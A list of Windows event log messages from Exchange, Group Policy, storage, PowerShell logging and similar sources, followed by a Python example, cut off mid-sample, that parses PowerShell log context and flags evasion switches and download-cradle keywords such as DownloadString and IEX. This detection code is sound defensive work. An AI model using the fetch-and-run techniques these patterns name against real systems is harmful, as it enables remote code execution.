Cluster Shared Volume 'Volume2' ('ClusterStorage Volume 2') is no longer available on this node because of 'STATUS_CLUSTER_CSV_AUTO_PAUSE_ERROR(c0130021)'. All I/O will temporarily be queued until a path to the volume is reestablished.
Category:
LDAP Operations
Message:
LDAP Bind was unsuccessful on directory OLDDC.domain.local for distinguished name ''. Directory returned error:[0x51] Server Down.
For more information, click http://www.microsoft.com/contentredirect.asp.
Source:
MSExchange SACL Watcher
Message:
SACL Watcher servicelet found that the SeSecurityPrivilege privilege is removed from account MYDOMAIN\Exchange Servers.
Message:
The IO operation at logical block address fd90027 for Disk 3 was retried.
Category:
Performance Monitoring
Message:
The performance counter "Performance System\Average Disk Queue Length" (PhysicalDisk(*)\Avg. Disk Queue Length) could not be monitored. Please make sure that the performance counter exists. If you are running a non-english version then you might have to adapt the name of the performance counter so it matches the language of the Operating System.
Message:
The ES Network Services log file is full.
Source:
Server Administrator
Category:
Storage Service
Message:
The controller debug log file has been exported.: Controller 0 (PERC 5/i Integrated)
Source:
Server Administrator
Category:
Storage Service
Message:
The controller write policy has been changed to Write Through.
Category:
102 (no category messagefile registered)
Message:
Error code 0000009c, parameter1 00000000, parameter2 bab3c050, parameter3 b6514000, parameter4 00000145.
Source:
Microsoft-Windows-GroupPolicy
Message:
The processing of Group Policy failed because of lack of network connectivity to a domain controller. This may be a transient condition. A success message would be generated once the machine gets connected to the domain controller and Group Policy has succesfully processed. If you do not see a success message for several hours, then contact your administrator.
Source:
Microsoft-Windows-TaskScheduler/Operational
Category:
Task Start Failed
Message:
Task Scheduler failed to start "\Some Important Task" task for user "MYDOMAIN\EventMonitor". Additional Data: Error Value: 2147942402.
Source:
Microsoft-Windows-Hyper-V-Worker
Message:
Device 'Microsoft Synthetic Display Controller' in 'SERVER01' is loaded but has a different version from the server. Server version 3.0 Client version 3.2 (Virtual machine ID 8D6415C4-6E44-78FC-6BB8-34CCA67ACF48). The device will work, but this is an unsupported configuration. This means that technical support will not be provided until this problem is resolved. To fix this problem, upgrade the integration services. To upgrade, connect to the virtual machine and select Insert Integration Services Setup Disk from the Action menu.
Message:
The DNS server has encountered numerous run-time events. To determine the initial cause of these run-time events, examine the DNS server event log entries that precede this event. To prevent the DNS server from filling the event log too quickly, subsequent events with Event IDs higher than 3000 will be suppressed until events are no longer being generated at a high rate.
Category:
print processor
Message:
4aCreateFile(C:\WINDOWS\System32\spool\PRINTERS\00176.spl) succeeded
Message:
The winlogon notification subscriber <Profiles> took nnn second(s) to handle the notification event (Logon).
Source:
Office SharePoint Server
Category:
Office Server Shared Services
Message:
Application Server Administration job failed for service instance Microsoft.Office.Server.Search.Administration.SearchServiceInstance (dbb94537-db22-448b-92c9-d1f684a4a13e).
Reason: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.
Techinal Support Details:
System.IO.FileNotFoundException: Could not find file 'C:\WINDOWS\system32\drivers\etc\HOSTS'.
File name: 'C:\WINDOWS\system32\drivers\etc\HOSTS'
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
at System.IO.FileInfo.OpenText()
at Microsoft.Search.Administration.Security.HOSTSFile.ParseHOSTSFile(Hashtable& HOSTSFileMappings, StringBuilder& HOSTSComments)
at Microsoft.Search.Administration.Security.HOSTSFile.ConfigureDedicatedGathering(SearchServiceInstance searchServiceInstance, SPServer dedicatedWebFrontEndServer, IList`1 previousWebApplicationHostNames)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.SynchronizeDefaultContentSource(IDictionary applications)
at Microsoft.Office.Server.Search.Administration.SearchServiceInstance.Synchronize()
at Microsoft.Office.Server.Administration.ApplicationServerJob.ProvisionLocalSharedServiceInstances(Boolean isAdministrationServiceJob)
Message:
Could not get performance counter registry information for WSearchIdxPi for instance due to the following error: The operation completed successfully. 0x0.
Message:
Performance monitoring cannot be initialised for the gatherer object, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.
Context: Application, SystemIndex Catalogue
Message:
Performance monitoring cannot be initialised for the gatherer service, because the counters are not loaded or the shared memory object cannot be opened. This only affects availability of the perfmon counters. Restart the computer.
Message:
The driver \Driver\WUDFRd failed to load for the device SWD\WPDBUSENUM\{e21c02d7-760e-11e3-be76-806e6f6e6963}#000000000003F000.
Message:
The description for Event ID 27 from source e1iexpress cannot be found. Either the component that raises this event is not installed on your local computer or the installation is corrupted. You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event:
Intel(R) 82583V Gigabit Network Connection
the message resource is present but the message is not found in the string/message table
Message:
Display driver amdkmdap stopped responding.
Message:
windows security center service could not stop windows defender
Message:
Unable to open the Server service performance object. The first four bytes (DWORD) of the Data section contains the status code.
Message:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.
Category:
Logging/Recovery
Message:
LiveComm (6812) C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\: The shadow header page of file C:\Users\Marion\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LiveComm\d7436ff03206bcfd\120712-0049\DBStore\livecomm.edb was damaged. The primary header page (8192 octets) was used instead.
Message:
Windows XP WIC installation failed.
Access is denied.
Message:
[ warning] [vmusr:vmtoolsd] Failed registration of app type 2 (Signals) from plugin unity.
Source:
Microsoft-Windows-CertificateServicesClient-CertEnroll
Message:
Certificate enrollment for Local system failed to enroll for a DomainController certificate with request ID N/A from testsql.domain.local\TESTCA (The RPC server is unavailable. 0x800706ba (WIN32: 1722)).
Message:
This computer was not able to set up a secure session with a domain controller in domain NETIKUS due to the following:
There are currently no logon servers available to service the logon request.
This may lead to authentication problems. Make sure that this computer is connected to the network. If the problem persists, please contact your domain administrator.
ADDITIONAL INFO
If this computer is a domain controller for the specified domain, it sets up the secure session to the primary domain controller emulator in the specified domain. Otherwise, this computer sets up the secure session to any domain controller in the specified domain.
Source:
Microsoft-Windows-IIS-W3SVC-PerfCounters
Message:
It has taken too long to refresh the W3SVC counters, the stale counters are being used instead.
Source:
MSExchange Mid-Tier Storage
Message:
Ping of mdb 'b001e27b-bd30-4b98-998d-d0baf7803fba' timed out after '00:00:00' minutes. Last successful ping was at '6/10/2014 11:50:11 AM' UTC.
Source:
MSExchange EdgeSync
Message:
Initialization failed with exception: Microsoft.Exchange.EdgeSync.Common.EdgeSyncServiceConfigNotFoundException: Couldn't find EdgeSync service configuration object for the site SiteName. If the configuration object doesn't exist in the Active Directory location CN=EdgeSyncService,CN=SiteName,CN=Sites,CN=Configuration,DC=domain,DC=local, create it using the New-EdgeSyncServiceConfig cmdlet. If the object does exist, check its permissions.. If this warning frequently occurs, contact Microsoft Product Support.
Message:
The default transaction resource manager on volume C: encountered a non-retryable error and could not start. The data contains the error code.
<Keywords>0x80000000000000</Keywords>
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 980) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (10). User Action: Contact your application vendor for an updated version of the application.
Detailed XML View
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2014-07-21T09:20:57.835029200Z" />
<EventRecordID>136</EventRecordID>
<Correlation />
<Execution ProcessID="980" ThreadID="112" />
<Channel>Application</Channel>
<Computer>Pochi-01</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">980</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">10</Data>
</EventData>
</Event>
Message:
Der Dienststatus von Dienst eventsentryheartbeatmonitor (EventSentry Heartbeat Monitor) ist weiterhin Stopped.
Zusätzliche Dienstinformationen:
Starttyp: Automatic
EXE-Datei: C:\WINDOWS\SYSWOW64\EVENTSENTRY\EVENTSENTRY_HB_SVC.EXE
Benutzerkonto: LocalSystem
Message:
ERROR: duplicate key value violates unique constraint "idx_es_logontracking_unique"
DETAIL: Key (computername, username, start_unix, logonid)=(2, 30, 1409919385, 0xedeedc2f) already exists.
STATEMENT: insert into eventsentry.ESLogonTracking (start_unix,start_datetime,computername,groupname,username,LogonID,SourceIP,SourceComputer,ComputerProductType,eventnumber,RemoteDesktopState,incomplete,duration,LogonType,IsSession) values(1409919385,'2014-09-05 12:16:25'::timestamp,2,3,30,'0xedeedc2f',3,13,'SRV',0,1,0,0,10,1)
Source:
MSExchangeIS Mailbox Store
Category:
Content Indexing
Message:
Content Indexing function 'CISearch::EcGetRowsetAndAccessor' received an unusual and unexpected error code from MSSearch.
Mailbox Database: Mailbox Database
Error Code: 0x80041606
Category:
NTP Synchronization
Message:
EventSentry was unable to retrieve the current time from host ntp.mydomain.local due to the following error: Server time not synchronised.
Source:
Microsoft-Windows-Time-Service
Message:
NtpClient was unable to set a domain peer to use as a time source because of discovery error. NtpClient will try again in 15 minutes and double the reattempt interval thereafter. The error was: The entry is not found. (0x800706E1)
Source:
Service Control Manager
Message:
De Windows Presentation Foundation Font Cache 3.0.0.0-service is bij het starten vastgelopen.
Source:
MSExchangeIS Mailbox
Category:
Content Indexing
Message:
Function CISearch::EcGetRowsetAndAccessor detected that content indexing was disabled for database "Mailbox Database 1144709849" because of error "0x80041820" from MSSearch.
Source:
Windows Server Update Services
Message:
No client computers have ever contacted the server.
Source:
Microsoft-Windows-CAPI2
Message:
Reached crypt32 threshold of 50 events and will suspend logging for 60 minutes.
Source:
Server Administrator
Message:
Log size is no longer near or at capacity
Log type: ESM
Message:
The following fatal alert was received: 42.
Message:
WUDFHost (8232) WindowsLocationProviderDatabase: An attempt to open the file "C:\ProgramData\Microsoft\Windows\LocationProvider\edbtmp.log" for read / write access failed with system error 5 (0x00000005): "Access is denied. ". The open file operation will fail with error -1032 (0xfffffbf8).
Source:
Microsoft-Windows-CAPI2
Message:
Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.
System Error:
Access is denied.
Source:
MSExchangeTransport
Message:
Receive connector Allow SMTP rejected an incoming connection from IP address 1.2.3.4. The maximum number of connections per source (20) for this connector has been reached by this source IP address.
Source:
MSExchangeTransport
Message:
A message with the Internal Message ID 12345 was rejected by the remote server. This message will be deferred and retried because it was marked for retry if rejected. Other messages may also have encountered this error.
Message:
The attempt by user DOMAIN\someuser to logoff computer WKS123 failed
Message:
Windows cannot determine the user or computer name. (Not enough storage is available to complete this operation. )
Source:
RPC (Microsoft-Windows-RPC-Events)
Message:
Log Name: Application
Source: Microsoft-Windows-RPC-Events
Date: 22/07/2015 13:43:53
Event ID: 11
Task Category: None
Level: Warning
Keywords:
User: LOCAL SERVICE
Computer: UNDERTHEBED7-PC
Description:
Possible Memory Leak. Application (C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted) (PID: 940) has passed a non-NULL pointer to RPC for an [out] parameter marked [allocate(all_nodes)]. [allocate(all_nodes)] parameters are always reallocated; if the original pointer contained the address of valid memory, that memory will be leaked. The call originated on the interface with UUID ({3f31c91e-2545-4b7b-9311-9529e8bffef6}), Method number (20). User Action: Contact your application vendor for an updated version of the application.
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-RPC-Events" Guid="{F4AED7C7-A898-4627-B053-44A7CAA12FCD}" />
<EventID>11</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-07-22T12:43:53.117673400Z" />
<EventRecordID>138</EventRecordID>
<Correlation />
<Execution ProcessID="940" ThreadID="1592" />
<Channel>Application</Channel>
<Computer>UNDERTHEBED7-PC</Computer>
<Security UserID="S-1-5-19" />
</System>
<EventData>
<Data Name="ApplicationName">C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted</Data>
<Data Name="ProcessId">940</Data>
<Data Name="InterfaceId">{3F31C91E-2545-4B7B-9311-9529E8BFFEF6}</Data>
<Data Name="Method">20</Data>
</EventData>
</Event>
Message:
The first Critical Blacklist Event found: Event ID - 1054 System log - Microsoft-Windows-GroupPolicy: The processing of Group Policy failed. Windows could not obtain the name of a domain controller. This could be caused by a name resolution failure. Verify your Domain Name System (DNS) is configured and working correctly.
Source:
Microsoft-Windows-WER-SystemErrorReporting
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x00000116 (0xffffe0008b64c4c0, 0xfffff8003e9d4650, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\WINDOWS\MEMORY.DMP. Report Id: 10281589-8be9-d71c-c713-e024f5515a45.
Source:
Microsoft-Windows-WMI
Message:
Windows Management Instrumentation has stopped WMIPRVSE.EXE because a quota reached a warning value. Quota: HandleCount Value: %2 Maximum value: 4096 WMIPRVSE PID: %4 Providers hosted in this process: %systemroot%\system32\wbem\cimwin32.dll
Source:
IIS-Configuration
Message:
Changes to '/system.applicationHost/sites/site[@name="Default Web Site" and @id="1"]/@state' at 'MACHINE/WEBROOT/APPHOST' have successfully been committed.
Category:
Heartbeat Monitoring
Message:
Starting with EventSentry build 3.2.1.28, the heartbeat agent can query the EventSentry database to determine a remote agent status, instead of querying the remote agent status using the Windows API. This can drastically improve the monitoring speed and is recommended for networks consisting of 50 or more Windows hosts.
To enable this functionality, the following SQL query will need to be executed on the EventSentry database:
-- Built-In Database (PostgreSQL)
REVOKE ALL ON TABLE eventsentry.essysinfo FROM eventsentry_svc;
GRANT SELECT, UPDATE, INSERT, DELETE ON TABLE eventsentry.essysinfo TO eventsentry_svc;
-- SQL Server
GRANT SELECT ON ESSysinfo (UptimeTimestamp) TO eventsentry_svc
-- MySQL
GRANT SELECT (computer, Uptime, UptimeMax, UptimeTimestamp), INSERT, UPDATE, UPDATE (UptimeTimestamp, lastserverinventoryupdate), DELETE ON essysinfo TO eventsentry_svc
It is also recommended to set the "Refresh uptime every" interval in the "Inventory" System Health package to 5 minutes.
Message:
Outlook disabled the following add-in(s):
ProgID: GDOfficeAddin.AddinBase
GUID: {0C2EB69C-2B8F-408B-A2C6-E831D1A6C774}
Name: G Data Outlook Add-In
Description: G Data Outlook Add-In
Load Behavior: 3
HKLM: 1
Location: c:\program files (x86)\common files\g data\avkmail\gdofficeaddinx86.dll
Threshold Time (Milliseconds): 1000
Time Taken (Milliseconds): 120875
Disable Reason: This add-in caused Outlook to start slowly.
Policy Exception (Allow List): 0
Source:
MSExchange MailTips
Message:
Process Microsoft.Exchange.InfoWorker.Common.Delayed`1[System.String]: MailTips query failed for mailbox <John Johnny JoeJoe>SMTP:jonjojo@acmecorp.com. Latency: total:1. The returned exception is: Microsoft.Exchange.Data.Storage.StorageTransientException: Cannot open mailbox /o=AcmeCorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCHGSERVER/cn=Microsoft System Attendant. ---> Microsoft.Mapi.MapiExceptionRpcServerTooBusy: MapiExceptionRpcServerTooBusy: Unable to make connection to the server. (hr=0x80004005, ec=2419)
Diagnostic context:
Lid: 41841 StoreEc: 0x973
Lid: 51059
Lid: 62321 StoreEc: 0x973
Lid: 47987
Lid: 50033 StoreEc: 0x973
Lid: 50544 ClientVersion: 15.0.995.27
Lid: 52080 StoreEc: 0x973
Lid: 51152
Lid: 52465 StoreEc: 0x973
Lid: 60065
Lid: 33777 StoreEc: 0x973
Lid: 59805
Lid: 52487 StoreEc: 0x973
Lid: 19778
Lid: 27970 StoreEc: 0x973
Lid: 17730
Lid: 25922 StoreEc: 0x973
at Microsoft.Mapi.MapiExceptionHelper.InternalThrowIfErrorOrWarning(String message, Int32 hresult, Boolean allowWarnings, Int32 ec, DiagnosticContext diagCtx, Exception innerException)
at Microsoft.Mapi.MapiExceptionHelper.ThrowIfError(String message, Int32 hresult, IExInterface iUnknown, Exception innerException)
Source:
Microsoft-Windows-Defrag
Message:
The volume WINRE_DRV was not optimized because an error was encountered: The parameter is incorrect. (0x80070057)
Source:
MSExchangeDiagnostics
Message:
Potential data loss warning in RetentionAgent: %1
Source:
MSExchange Store Driver Submission
Message:
The store driver failed to submit eventID mailboxID MDBID and couldn't generate an NDR due to exception Microsoft.Exchange.MailboxTransport.StoreDriverCommon.InvalidSenderException
Category:
Heartbeat Monitoring
Message:
SNMP or agent monitoring of host SOMESERVER has failed 17% of the time over the last 3600 seconds and is now disabled. To re-enable SNMP and/or agent monitoring of host SOMESERVER, restore full connectivity to the remote host, locate the host in the management console and click the "Retry" button in the summary view.
Category:
Heartbeat Monitoring
Message:
EventSentry was unable to retrieve SNMP data from host somedevice.company.com and cannot monitor this host using SNMP. This event is being logged because this host was successfully monitored via SNMP in the past. To retry, open the management console, select the host and click the retry button on the top right.
Source:
MSExchangeDiagnostics
Message:
ConnectionStringManager unable to connect to partitioning DB: Connection string used to access the partitioning DB is null or empty
Source:
MSExchangeApplicationLogic
Message:
Scenario: ProcessKillBit. Failed to read killbit list file because of exception System.IO.IOException: The process cannot access the file 'D:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\owa\prem\15.0.1178.9\ext\killbit\killbit.xml' because it is being used by another process.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at System.IO.File.Open(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.Exchange.Data.ApplicationLogic.Extension.KillBitHelper.TryReadKillBitFile(Int32& refreshRate, DateTime& lastModifiedTime)
Source:
MSExchangeFrontEndTransport
Message:
The Ehlo options for the client proxy target 10.10.5.123 did not match while setting up proxy for user amata/es_smtp on inbound session 08D40BBF5D3046B3. The mismatched settings might cause some messages to get rejected. Continue with proxying even though there is a mismatch. The critical non-matching options were maxSize. The non-critical non-matching options were .
Source:
Windows Server Update Services
Message:
The catalog was last synchronized successfully 1 or more days ago.
Source:
Server Administrator
Category:
Storage Service
Message:
Controller battery is discharging: Battery 0 Controller 0
Message:
Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005, Access is denied.
. This is often caused by incorrect security settings in either the writer or requestor process.
Operation:
Gathering Writer Data
Context:
Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
Writer Name: System Writer
Writer Instance ID: {e720aa26-50d9-4d36-93f3-494b8ec76700}
Message:
svchost (852) A significant portion of the database buffer cache has been written out to the system paging file. This may result in severe performance degradation.
See help link for complete details of possible causes.
Resident cache has fallen by 5426 buffers (or 99%) in the last 8805 seconds.
Current Total Percent Resident: 0% (2 of 5428 buffers)
Source:
Microsoft-Windows-DNS-Server-Service
Message:
Zone somedomain.local expired before it could obtain a successful zone transfer or update from a master server acting as its source for the zone. The zone has been shut down.
Category:
Service Monitoring
Message:
The status for service mapsbroker (Downloaded Maps Manager) remains Stopped.
Additional Service Information:
Startup type: Automatic
Executable: C:\Windows\System32\svchost.exe -k NetworkService
Service account: NT AUTHORITY\NetworkService
Source:
Citrix System Monitoring
Message:
The Queue thread stopped responding. The Citrix System Monitoring Agent will shutdown and restart.
Category:
Collector Client
Message:
The EventSentry agent successfully established a secure connection with the collector (collector.yourdomain.com at port 5001).
Negotiated SSL parameters: Protocol: TLS1.2 Cipher: AES Cipher strength: 128 Hash: SHA256 Hash strength: 256 Key exchange: RSA Key exchange strength: 2048
Message:
The filter chain for event log package Filter Chain ABC is complete.
Duration: 34 second(s)
Insertion Strings (if any):
Message:
Product: Microsoft Office Professional Plus 2016 - Update '{E296D50E-EFEB-48F5-9CBE-5A335AE2D49F}' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127
Message:
DCOM got error "2147944122" from the computer 10.10.10.x when attempting to activate the server {4CB43D7F-7EEE-4906-8698-60DA1C38F2FE}
Message:
The following fatal alert was generated: 10. The internal error state is 1203. A related event message follows:
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The SSL connection request has failed
Source:
Trend Status Check (AV)
Message:
Automated remediation failed. Antivirus Product Trend Status Check - 547 Days Out-Of-Date
Message:
The following fatal alert was received: 70.
Message:
The IPMI device driver attempted to communicate with the IPMI BMC device during normal operation. However the communication failed due to a timeout. You can increase the timeouts associated with the IPMI device driver.
Source:
Service Control Manager Eventlog Provider
Message:
The Windows Modules Installer service failed to start due to the following error: The service did not start due to a logon failure.
Category:
Engine Lifecycle
Message:
Engine state is changed from None to Available.
Details:
NewEngineState=Available
PreviousEngineState=None
SequenceNumber=134
HostName=ConsoleHost
HostVersion=2.0
HostId=e14c96d4-bf0d-4a3a-8e84-c7851ebb29d7
EngineVersion=2.0
RunspaceId=7b090c70-10a9-43d7-9ce4-15a8b1bc0e0b
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Category:
Engine Lifecycle
Message:
Engine state is changed from Available to Stopped.
Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=125
HostName=ConsoleHost
HostVersion=2.0
HostId=e668b266-c1e3-4faa-2242-90c012cd4691
EngineVersion=2.0
RunspaceId=ed6416ce-3230-40b2-9d58-c5b709b4f3d9
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Category:
Command Lifecycle
Message:
Command "Write-Host" is Started.
Details:
NewCommandState=Started
SequenceNumber=19
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test
Category:
Command Lifecycle
Message:
Command "Write-Host" is Stopped.
Details:
NewCommandState=Stopped
SequenceNumber=20
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test
Category:
Provider Lifecycle
Message:
Provider "Registry" is Started.
Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=6
HostName=ConsoleHost
HostVersion=2.0
HostId=81e282e6-724d-4184-9600-615816366546
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Category:
Pipeline Execution Details
Message:
Pipeline execution details for command line: Write-Host Test.
Context Information:
DetailSequence=1
DetailTotal=1
SequenceNumber=50
UserId=DOMAIN\username
HostName=ConsoleHost
HostVersion=4.0
HostId=5f2b609e-c195-4914-b7bb-09f492cb0056
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=4.0
RunspaceId=77d31d66-4314-43f4-bf5a-caa6757c2130
PipelineId=8
ScriptName=
CommandLine=Write-Host Test
Details:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="Test"
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
Error Message = File C:\Users\wizard\test.ps1 cannot be loaded. The file C:\Users\wizard\test.ps1 is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
Fully Qualified Error ID = UnauthorizedAccess
Recommended Action =
Context:
Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = babd41a2-db0f-45d0-ac50-e34b71dd9ac0
Host Application = powershell . .\test.ps1
Engine Version = 5.1.14393.1944
Runspace ID = 0155307c-603a-440d-a22c-85b5c9cbffff
Pipeline ID = 1
Command Name =
Command Type =
Script Name =
Command Path =
Sequence Number = 15
User = DOMAIN\user
Connected User =
Shell ID = Microsoft.PowerShell
User Data:
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="TestPowerShellV5"
Context:
Severity = Informational
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = e44f3df1-0f65-48dc-814a-01219d11a426
Host Application = powershell Write-Host TestPowerShellV5
Engine Version = 5.1.14393.1944
Runspace ID = 0b4180d7-55ca-476a-9712-26e61d5c3be1
Pipeline ID = 1
Command Name = Write-Host
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 16
User = DOMAIN\username
Connected User =
Shell ID = Microsoft.PowerShell
User Data:
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is starting up
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is ready for user input
Source:
Microsoft-Windows-PowerShell
Category:
Execute a Remote Command
Message:
Creating Scriptblock text (1 of 1):
Write-Host PowerShellV5ScriptBlockLogging
ScriptBlock ID: 6d90e0bb-e381-4834-8fe2-5e076ad267b3
Path:
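The PowerShell entries above all carry their context in the same two shapes: Key=Value lines in the classic Windows PowerShell log (Engine Lifecycle 400/403, Command Lifecycle 500/501, Pipeline Execution Details 800), "Key = Value" lines in Microsoft-Windows-PowerShell/Operational (4103), and the raw script text in a 4104 "Creating Scriptblock text" event. The following is an added example, not part of the EventSentry message database and not EventSentry code: it parses both context formats plus the 4104 script block, then flags the things a defender looks at first in the HostApplication / CommandLine fields (encoded commands, execution-policy bypass, hidden windows, suppressed profiles) and download cradles in script block text. The switch and cradle lists, the finding labels, and the two "suspicious" sample messages are the example's own assumptions; the two benign samples are taken from the entries above.

```python
import re
from typing import Dict, List

# One context line: "HostApplication=..." (classic Windows PowerShell log,
# IDs 400/403/500/501/800) or "Host Application = ..." (Operational log, 4103).
_KV_RE = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?)\s*=\s*(.*?)\s*$")

# Command-line switches worth a second look. This list is an assumption of
# the example, not a classification the event log itself provides.
SUSPICIOUS_SWITCHES = [
    (r"-e(?:c|n|nc|ncodedcommand)?\b", "encoded command"),
    (r"-e(?:p|x[a-z]*)\s+bypass", "execution policy bypass"),
    (r"-w[a-z]*\s+hidden", "hidden window"),
    (r"-nop[a-z]*\b", "profile suppressed"),
]

# Download-cradle fragments that show up inside 4104 script block text
# (again an assumed, illustrative list).
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"invoke-expression|\biex\b",
    re.IGNORECASE,
)

# Script text sits between the "Creating Scriptblock text" header and the
# "ScriptBlock ID:" line of a 4104 message.
_SCRIPTBLOCK_RE = re.compile(
    r"Creating Scriptblock text \(\d+ of \d+\):\r?\n(.*?)\r?\nScriptBlock ID:",
    re.DOTALL,
)


def parse_context(text: str) -> Dict[str, str]:
    """Collect the Key=Value / Key = Value lines of a PowerShell event.

    Keys lose their spaces so that 'Host Application' (4103) and
    'HostApplication' (403) end up under the same name.
    """
    ctx: Dict[str, str] = {}
    for line in text.splitlines():
        m = _KV_RE.match(line)
        if m:
            ctx[m.group(1).replace(" ", "")] = m.group(2)
    return ctx


def parse_scriptblock(text: str) -> str:
    """Return the script text carried by a 4104 event, or '' if there is none."""
    m = _SCRIPTBLOCK_RE.search(text)
    return m.group(1).strip() if m else ""


def assess(text: str) -> List[str]:
    """Return the findings an analyst would want raised for one event message."""
    findings: List[str] = []
    ctx = parse_context(text)
    cmdline = " ".join(
        v for k, v in ctx.items() if k in ("HostApplication", "CommandLine")
    )
    for pattern, label in SUSPICIOUS_SWITCHES:
        if re.search(pattern, cmdline, re.IGNORECASE):
            findings.append(label)
    if CRADLE_RE.search(parse_scriptblock(text)):
        findings.append("download cradle in script block")
    return findings


# Benign samples, constructed from the 403 and 4104 entries above.
SAMPLE_403_BENIGN = """Details:
NewEngineState=Stopped
PreviousEngineState=Available
HostName=ConsoleHost
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
CommandLine="""

SAMPLE_4104_BENIGN = """Creating Scriptblock text (1 of 1):
Write-Host PowerShellV5ScriptBlockLogging
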